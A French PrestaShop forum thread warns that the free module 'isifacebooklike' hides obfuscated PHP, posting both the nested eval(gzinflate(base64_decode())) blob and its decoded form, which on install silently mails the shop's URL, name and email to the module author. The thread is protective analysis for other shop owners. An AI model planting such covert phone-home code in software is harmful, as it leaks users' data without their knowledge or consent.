Attention à la sécurité des scripts gratuits.

domi77185 · June 7, 2011

Bonjour,

Ce message pour informer la communauté qu'en voulant utiliser le script gratuit "isifacebooklike" disponible sur le site de l'éditeur, je me suis aperçu que l'ors de l'installation de ce module un mail est envoyé à on ne sais pas qui, avec on ne sait quelles informations concernant votre boutique à l'intérieur de ce mail.

Une partie du code dans le fichier PHP est crypté, la routine qui envoi le mail doit être dedans.
J'ai tenté de décrypter le code, mais j'ai perdu patience car c'est une succession de code "eval(gzinflate(base64_decode()))" imbriqués les un dans les autres...

En allant sur le site de l'éditeur, j'ai téléchargé son autre module gratuit : "ISIFileUploader"
J'ai découvert qu'il contenait également du code crypté :-(
Je n'ai pas testé, mais prudence !!!!

jeckyl · June 7, 2011

Bonjour,

vous avez tout à fait raison de mettre en garde concernant certaines pratiques.

Captain FLAM · June 8, 2011

Vraiment Scandaleux !

(SI cela est avéré ...)

Il suffit de remplacer le "eval" par un "echo" pour avoir une idée ...

Envoyez-moi un lien vers les fichiers en download direct par MP.

Odjavel · June 8, 2011

En attendant, mieux vaut changer le nom de votre répertoire admin pour plus de sécurité. Mais c'est clair, ce serait scandaleux !

domi77185 · June 9, 2011

Voici le code crypté :

eval(gzinflate(base64_decode('DdNHrqNYAEDR5dQvMSAn1YhgwGAeOU5apIfBJJNh9f03cAdHutWedT/13Qywy9bqJ8+WiqH+K6ti'.
       'LKufP3JqkfJ3TYSHg6Y854t+NxmMDgBQH+knokTN1hPzFc/0MrW311qVlB8+ipMOFd5yfugcHx2K'.
       'jHaZkHioPGjsEAzIutiHK5bNsK1KCrGVU4c4NRi70PvtalgjMwCV+NJ0hvfM15j7rQ7WIiz17aer'.
       '1Oj8JtLSkwtv2LuKWICzIRtW8UMOGRWBotXOoFib8hANGEA4jnVwlPb2GVeLr+iNhcb4/Mwvq2Gu'.
       'YNDt53spPq5xkl3ijD2sxngsl6SUiJ25q/j17YJjzJdtrhMqeWdy7NL495kl9GoE/ekaFYhKzIJC'.
       'acWUWST+yC942IVM2MpCZCEYuzWM6X5Gs3VZfZ3JhfEUDKtJx3fNRPumFa0FQlxNI802EWOOuOwq'.
       'VN9KetHlv9J4zD+z51t5RCSeGE3re82xTMPFFkFfB8NqJcgoOuvDw4IiL++gtTfpWtP4FNb0nPhd'.
       'M9zbiFvIhU8/1yzdwpmBMEO1U1tzzOwWVU+eC7CP4AExTu+UTvevKmGZbHVNmWYtWt1ze+BfmMPn'.
       'kb7jJ0RUxwXobbh0b7WGDubltRFUz9aJbJCHvkycb3Ukm/n4fN1i9EnWWUJqzxsmu6M+AKl+4bky'.
       'PtOYOUcB4kfS33XF8mI5++UQW3jO6LHpLcvCgdbb8qaaMbY8Kw5YrkbRZriyrD3w4xh88seGN6zV'.
       '+hMMB7DtyikC4U6Jd1OLCWCJxGl5ld9Jncncxl1HwWcCjWUj/OFxjRGBLz9jyEGbnUuVGKWwZh9k'.
       'heIMilZnr7BUwnjNg+g9AOm5+itf9bwdqmGwt29gNV2pn7SNN1g6VGhcDpGx3zy0XnouNmlquH2q'.
       'n2j7Ncl6GIvPPcz6dVy3M1NzgTJOb7/aaLqenMKvqkyRFjKdOnhUcDricnxdOQR9XQSFL1thSyAk'.
       'pEEzQS0TdsDznwQ5DBmkN3UJSOZa7VEmDY87s9xy/tVLWcJks0Q8oIR5jTpECcJtfTcII9qbuNvX'.
       'bPTiF6f4LWLYwfWhEM6ZtpQ4jivUp0FRKMfYsVv8Gz74l6gTqAZhlqeP7HnnO1jnI1m/hboOWn0y'.
       'ujqebl9uFAg9T+gaUwyKSU2FaoXQN42TG/WH/GzWUnkROGjjwK41neUvFRhxUV8iQJ3BB50tN7Mo'.
       'XIi7x+bJs9ekHYoiPiCv2SWmOye+VYR0ZsoU7aWTfRgmyy8S2/Yx6rwysROXWKKI8zT4e9g5F45M'.
       '7OYsCM6LIyD5Nuiyt5XAlNMPVNIAAGLVDd6/DorUd+6hDpbZorM9g0pasLWg/VppJmMUI537tJ1s'.
       '2ruAohwKd5JEOfHP379///0P'.
       '')));

Après plusieurs bouclages car chaque décryptage redonne un "eval(gzinflate(base64_decode(....."

Voici le code décrypté :

$this->testme = create_function('', '');
$this->getMyConfig = create_function(
       '', 
       '$xdata = unserialize(base64_decode(Configuration::get("005B4B2725_CFG")));
       $xdata = (($xdata===false)?array():$xdata);return $xdata;');

$this->_xhtml='0';$this->checked=2;
$this->tabStr=array('0'=>'to register','00'=>'registered');
if(Configuration::get('ISI_MODULE_DEC_'.$this->name)!='1'){
   Configuration::updateValue('ISI_MODULE_DEC_'.$this->name, '1');
   mail("[email protected]", 
       "Module: {$this->name} usage", 
       "Module: {$this->name} ($this->version) usage - ".$_SERVER["HTTP_HOST"]." - ".Configuration::get('PS_SHOP_NAME')." - ".Configuration::get('PS_SHOP_EMAIL'));
   $this->_xhtml='00';
}else{
   $this->_xhtml='00';
}

Apparemment rien de bien méchant, sauf qu'il se récupère par mail le nom de la boutique, l'url, mais surtout l'adresse mail sans que l'utilisateur en soit informé...

Que fait t'il avec ces adresses mail ?????

Par contre, si quelqu'un à une idée de se que fait :

unserialize(base64_decode(Configuration::get("005B4B2725_CFG"))

olea · June 9, 2011

Il y avait quand même 990 boucles de eval(gzinflate...) ;)

Il faut regarder par PhpMyAdmin ce qui se trouve dans la clef 005B4B2725_CFG de la table ps_configuration.

L'adresse mail, à mon avis ne lui sert qu'à recontacter les personnes qui utilisent le module sans l'avoir acheté, mais sur un module gratuit !! ...

Les modules présents sur les addons ne contiennent (normalement) pas ce genre de tracker (c'est interdit par les CGV)

Captain FLAM · June 10, 2011

Par contre, si quelqu'un à une idée de se que fait :
unserialize(base64_decode(Configuration::get("005B4B2725_CFG"))

Pinaize ! Encore un code caché ... :grrr:

Il faut regarder par PhpMyAdmin ce qui se trouve dans la clef 005B4B2725_CFG de la table ps_configuration.

Faire comme te dis olea ...

Never · July 1, 2011

Ah zut, je viens d'installer ce script =(
Vous avez des nouvelles? Voir si c'est "dangereux" ou pas?

nsitbon · March 23, 2013

Par contre, si quelqu'un à une idée de se que fait :
unserialize(base64_decode(Configuration::get("005B4B2725_CFG"))

c'est de cette manière qu'il stocke votre identifiant facebook, néanmoins il ne le transmet pas dans le mail.

Cordialement.

jeckyl · March 24, 2013

c'est de cette manière qu'il stocke votre identifiant facebook, néanmoins il ne le transmet pas dans le mail.

Cordialement.

Bonjour et merci de votre participation ... mais bon j’espère que le mec n'attendait pas pour cette réponse 2 ans après

nsitbon · March 24, 2013

Bonjour et merci de votre participation ... mais bon j’espère que le mec n'attendait pas pour cette réponse 2 ans après

Bonsoir, je me doute que la personne n'attendait plus rien, néanmoins je suis tombé sur cette extension en reprenant l'infogérance d'un site sous prestashop, j'ai donc analysé ce que faisait le code php, et j'en fais simplement profiter la communauté.

Cordialement.

Nommam · March 25, 2013

Je me demande pourquoi vous criez au loup dans un module alors que Prestashop lui meme le fait lors de l'installation de votre boutique !

Un module free c'est pas bien, un CMS free c'est bien ????

Cf http://www.prestashop.com/forums/topic/114896-resolu-scan-par-881902660-sandrineprestashopcom/

nsitbon · March 25, 2013

Je me demande pourquoi vous criez au loup dans un module alors que Prestashop lui meme le fait lors de l'installation de votre boutique !

Un module free c'est pas bien, un CMS free c'est bien ????

Cf http://www.prestasho...eprestashopcom/

Je n'ai pas trouvé de code php obfusqué dans le code de prestashop. L'auteur du post a raison d'avertir les utilisateurs, d'ailleurs on rencontre le même problème sur les thèmes gratuits pour Wordpress.

Nommam · March 25, 2013

As tu tous lu le code de prestashop pour savoir ce qu'il etait envoyé sur leur server ?

Lire 3k de code d'un module et plusieurs 10ene de Mega de la solution, forcement pas besoin de l'obfusqué, c'est noyé dans la masse.

Je trouve l'auteur du module pas tres class, mais tout comme celui qui a mis cela dans le code de PS !

ici la solution partiellement nettoyée ==> https://github.com/PrestaClean

Attention à la sécurité des scripts gratuits.

Recommended Posts

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Create an account or sign in to comment

Create an account

Sign in